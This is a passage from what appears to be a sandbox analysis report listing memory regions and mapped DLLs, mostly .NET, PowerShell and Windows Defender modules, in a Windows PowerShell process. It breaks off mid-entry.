Region: id = 471 start_va = 0x7ffb70830000 end_va = 0x7ffb7086ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70830000" filename = "" Region: id = 472 start_va = 0x7ffb70870000 end_va = 0x7ffb7087ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70870000" filename = "" Region: id = 473 start_va = 0x7ffbcb340000 end_va = 0x7ffbcd34efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.manaa57fc8cc#\\c5788d802ee1c43bd2595d4bd8068373\\system.management.automation.ni.dll") Region: id = 474 start_va = 0x1e338ea0000 end_va = 0x1e338f01fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscorrc.dll") Region: id = 475 start_va = 0x1e338f10000 end_va = 0x1e338f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f10000" filename = "" Region: id = 476 start_va = 0x1e338b30000 end_va = 0x1e338b34fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 477 start_va = 0x1e338b40000 end_va = 0x1e338b4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 478 start_va = 0x7ffbeb400000 end_va = 0x7ffbeb407fff monitored = 0 entry_point = 0x7ffbeb4010b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 479 start_va = 0x7ffb70880000 end_va = 0x7ffb7088ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70880000" filename = "" Region: id = 480 start_va = 0x7ffbd5ff0000 end_va = 0x7ffbd603ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.numerics\\0b78453b55fd5a9dd4227b840b3c26ab\\system.numerics.ni.dll") Region: id = 481 start_va = 0x7ffbd5160000 end_va = 0x7ffbd51fbfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.mf49f6405#\\a85ca0608e46590b3c5efc58b708c91d\\microsoft.management.infrastructure.ni.dll") Region: id = 482 start_va = 0x7ffbcaa90000 end_va = 0x7ffbcb335fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\c2f35cb9621b8ca33a05759bbb0683c1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.xml\\c2f35cb9621b8ca33a05759bbb0683c1\\system.xml.ni.dll") Region: id = 483 start_va = 0x1e351090000 end_va = 0x1e35118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351090000" filename = "" Region: id = 484 start_va = 0x7ffbd0af0000 end_va = 0x7ffbd0c51fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.dired13b18a9#\\4e86c0566600de46fccb2961b7fbe310\\system.directoryservices.ni.dll") Region: id = 485 start_va = 0x7ffbca930000 end_va = 0x7ffbcaa8efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\2b17cdd44210c6b182c3804d228caba4\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.management\\2b17cdd44210c6b182c3804d228caba4\\system.management.ni.dll") Region: id = 486 start_va = 0x7ffb70890000 end_va = 0x7ffb7089ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70890000" filename = "" Region: id = 487 start_va = 0x7ffb708a0000 end_va = 0x7ffb708affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708a0000" filename = "" Region: id = 488 start_va = 0x7ffb708b0000 end_va = 0x7ffb708bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708b0000" filename = "" Region: id = 489 start_va = 0x7ffb708c0000 end_va = 0x7ffb708cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708c0000" filename = "" Region: id = 490 start_va = 0x7ffb708d0000 end_va = 0x7ffb708dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708d0000" filename = "" Region: id = 491 start_va = 0x7ffb708e0000 end_va = 0x7ffb708effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708e0000" filename = "" Region: id = 492 start_va = 0x7ffb708f0000 end_va = 0x7ffb708fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb708f0000" filename = "" Region: id = 493 start_va = 0x7ffb70900000 end_va = 0x7ffb7090ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70900000" filename = "" Region: id = 494 start_va = 0x7ffb70910000 end_va = 0x7ffb7091ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70910000" filename = "" Region: id = 495 start_va = 0x7ffb70920000 end_va = 0x7ffb7092ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70920000" filename = "" Region: id = 496 start_va = 0x7ffb70930000 end_va = 0x7ffb7093ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70930000" filename = "" Region: id = 497 start_va = 0x7ffb70940000 end_va = 0x7ffb7094ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70940000" filename = "" Region: id = 498 start_va = 0x7ffb70950000 end_va = 0x7ffb7095ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70950000" filename = "" Region: id = 499 start_va = 0x7ffbe3480000 end_va = 0x7ffbe34abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.confe64a9051#\\44fe61ba9d3d7a07f59d4d61b684745f\\system.configuration.install.ni.dll") Region: id = 500 start_va = 0x7ffbd1200000 end_va = 0x7ffbd12d7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\ed6d04a18216e12e72d7813b2a427519\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.transactions\\ed6d04a18216e12e72d7813b2a427519\\system.transactions.ni.dll") Region: id = 501 start_va = 0x7ffbe18e0000 end_va = 0x7ffbe192efff monitored = 1 entry_point = 0x7ffbe19001ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 502 start_va = 0x1e338f20000 end_va = 0x1e338f6bfff monitored = 1 entry_point = 0x1e338f401ae region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 506 start_va = 0x7ffb70960000 end_va = 0x7ffb7096ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70960000" filename = "" Region: id = 507 start_va = 0x7ffbe3090000 end_va = 0x7ffbe3094fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.diagnostics.tracing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Diagd2d95910#\\8076609d42bb39dd02decd6175250122\\System.Diagnostics.Tracing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.diagd2d95910#\\8076609d42bb39dd02decd6175250122\\system.diagnostics.tracing.ni.dll") Region: id = 508 start_va = 0x7ffbd0fd0000 end_va = 0x7ffbd10f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\2fe311002b76e58f2f89f897a32b62a2\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.configuration\\2fe311002b76e58f2f89f897a32b62a2\\system.configuration.ni.dll") Region: id = 509 start_va = 0x1e338f20000 end_va = 0x1e338f20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 510 start_va = 0x1e338f20000 end_va = 0x1e338f28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 511 start_va = 0x1e338f20000 end_va = 0x1e338f20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 512 start_va = 0x1e338f20000 end_va = 0x1e338f28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 513 start_va = 0x1e338f20000 end_va = 0x1e338f20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 514 start_va = 0x1e338f20000 end_va = 0x1e338f28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 515 start_va = 0xb156400000 end_va = 0xb15647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156400000" filename = "" Region: id = 516 start_va = 0xb156480000 end_va = 0xb1564fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156480000" filename = "" Region: id = 517 start_va = 0x7ffb70970000 end_va = 0x7ffb7097ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70970000" filename = "" Region: id = 518 start_va = 0x7ffbd09e0000 end_va = 0x7ffbd0aedfff monitored = 1 entry_point = 0x7ffbd09e1080 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll") Region: id = 519 start_va = 0x1e338f20000 end_va = 0x1e338f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f20000" filename = "" Region: id = 520 start_va = 0x1e338f30000 end_va = 0x1e338f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f30000" filename = "" Region: id = 521 start_va = 0x7ffb70980000 end_va = 0x7ffb7098ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70980000" filename = "" Region: id = 522 start_va = 0x1e338f30000 end_va = 0x1e338f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f30000" filename = "" Region: id = 523 start_va = 0x7ffbe16d0000 end_va = 0x7ffbe1731fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\65012908bad668fe7862ae251eb099a8\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p6f792626#\\65012908bad668fe7862ae251eb099a8\\microsoft.powershell.security.ni.dll") Region: id = 524 start_va = 0x7ffb70990000 end_va = 0x7ffb7099ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70990000" filename = "" Region: id = 525 start_va = 0x7ffbdfc80000 end_va = 0x7ffbdfc8bfff monitored = 0 entry_point = 0x7ffbdfc835c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 526 start_va = 0x1e351190000 end_va = 0x1e35128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351190000" filename = "" Region: id = 527 start_va = 0x1e338f30000 end_va = 0x1e338f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f30000" filename = "" Region: id = 528 start_va = 0x1e338f30000 end_va = 0x1e338f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f30000" filename = "" Region: id = 529 start_va = 0x7ffb709a0000 end_va = 0x7ffb709affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709a0000" filename = "" Region: id = 530 start_va = 0x7ffb709b0000 end_va = 0x7ffb709bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709b0000" filename = "" Region: id = 531 start_va = 0x7ffb709c0000 end_va = 0x7ffb709cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709c0000" filename = "" Region: id = 532 start_va = 0x7ffb709d0000 end_va = 0x7ffb709dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709d0000" filename = "" Region: id = 533 start_va = 0x7ffbdfb10000 end_va = 0x7ffbdfb1bfff monitored = 0 entry_point = 0x7ffbdfb118b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 534 start_va = 0x7ffbea1f0000 end_va = 0x7ffbea3b6fff monitored = 0 entry_point = 0x7ffbea24db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 535 start_va = 0x7ffbea000000 end_va = 0x7ffbea00ffff monitored = 0 entry_point = 0x7ffbea0056e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 536 start_va = 0x7ffbeac70000 end_va = 0x7ffbeacc4fff monitored = 0 entry_point = 0x7ffbeac87970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 537 start_va = 0xb156500000 end_va = 0xb15657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156500000" filename = "" Region: id = 538 start_va = 0x1e338f30000 end_va = 0x1e338f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e338f30000" filename = "" Region: id = 539 start_va = 0x1e338f40000 end_va = 0x1e338f50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e338f40000" filename = "" Region: id = 540 start_va = 0x1e338f60000 end_va = 0x1e338f63fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 541 start_va = 0xb156580000 end_va = 0xb1565fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156580000" filename = "" Region: id = 542 start_va = 0x1e351290000 end_va = 0x1e35148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351290000" filename = "" Region: id = 543 start_va = 0x7ffbe8f80000 end_va = 0x7ffbe8fa3fff monitored = 0 entry_point = 0x7ffbe8f83260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 544 start_va = 0x1e338f60000 end_va = 0x1e338f69fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 545 start_va = 0x1e351490000 end_va = 0x1e351493fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 546 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 547 start_va = 0x1e351490000 end_va = 0x1e3514b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 548 start_va = 0x1e351490000 end_va = 0x1e3514b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 549 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 550 start_va = 0x1e351490000 end_va = 0x1e351496fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 551 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 552 start_va = 0x1e351490000 end_va = 0x1e3514d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 553 start_va = 0x1e351490000 end_va = 0x1e3514d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 554 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 555 start_va = 0x1e351490000 end_va = 0x1e3514c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 556 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 557 start_va = 0x1e351490000 end_va = 0x1e3514c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 558 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 559 start_va = 0x1e351490000 end_va = 0x1e351491fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 560 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 561 start_va = 0x1e351490000 end_va = 0x1e351492fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 562 start_va = 0x1e351490000 end_va = 0x1e3514b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 565 start_va = 0x1e351490000 end_va = 0x1e35149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351490000" filename = "" Region: id = 566 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 567 start_va = 0xb156600000 end_va = 0xb156f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156600000" filename = "" Region: id = 568 start_va = 0x1e351490000 end_va = 0x1e35156cfff monitored = 0 entry_point = 0x1e3514ee0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 569 start_va = 0xb156f90000 end_va = 0xb15700ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b156f90000" filename = "" Region: id = 570 start_va = 0x7ffbe3080000 end_va = 0x7ffbe308ffff monitored = 0 entry_point = 0x7ffbe30851b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 571 start_va = 0x1e351490000 end_va = 0x1e351490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e351490000" filename = "" Region: id = 572 start_va = 0x7ffbe18c0000 end_va = 0x7ffbe18dcfff monitored = 0 entry_point = 0x7ffbe18ce930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 573 start_va = 0x7ffbd1120000 end_va = 0x7ffbd11fefff monitored = 0 entry_point = 0x7ffbd1154ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 574 start_va = 0x1e3514a0000 end_va = 0x1e3514a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 575 start_va = 0x1e3514b0000 end_va = 0x1e3515affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514b0000" filename = "" Region: id = 576 start_va = 0x1e3515b0000 end_va = 0x1e3515ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3515b0000" filename = "" Region: id = 577 start_va = 0xb157010000 end_va = 0xb15708ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157010000" filename = "" Region: id = 578 start_va = 0xb157090000 end_va = 0xb1570cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157090000" filename = "" Region: id = 579 start_va = 0x7ffb709e0000 end_va = 0x7ffb709effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709e0000" filename = "" Region: id = 580 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 581 start_va = 0x7ffbca5f0000 end_va = 0x7ffbca929fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = 